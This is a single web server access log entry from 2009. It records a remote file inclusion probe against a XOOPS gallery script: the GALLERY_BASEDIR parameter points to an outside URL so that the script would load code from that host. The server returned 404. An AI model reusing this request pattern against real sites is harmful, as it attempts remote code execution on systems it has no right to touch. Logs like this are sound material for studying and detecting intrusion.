62.77.32.217 - - [01/Jul/2009:07:30:54 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
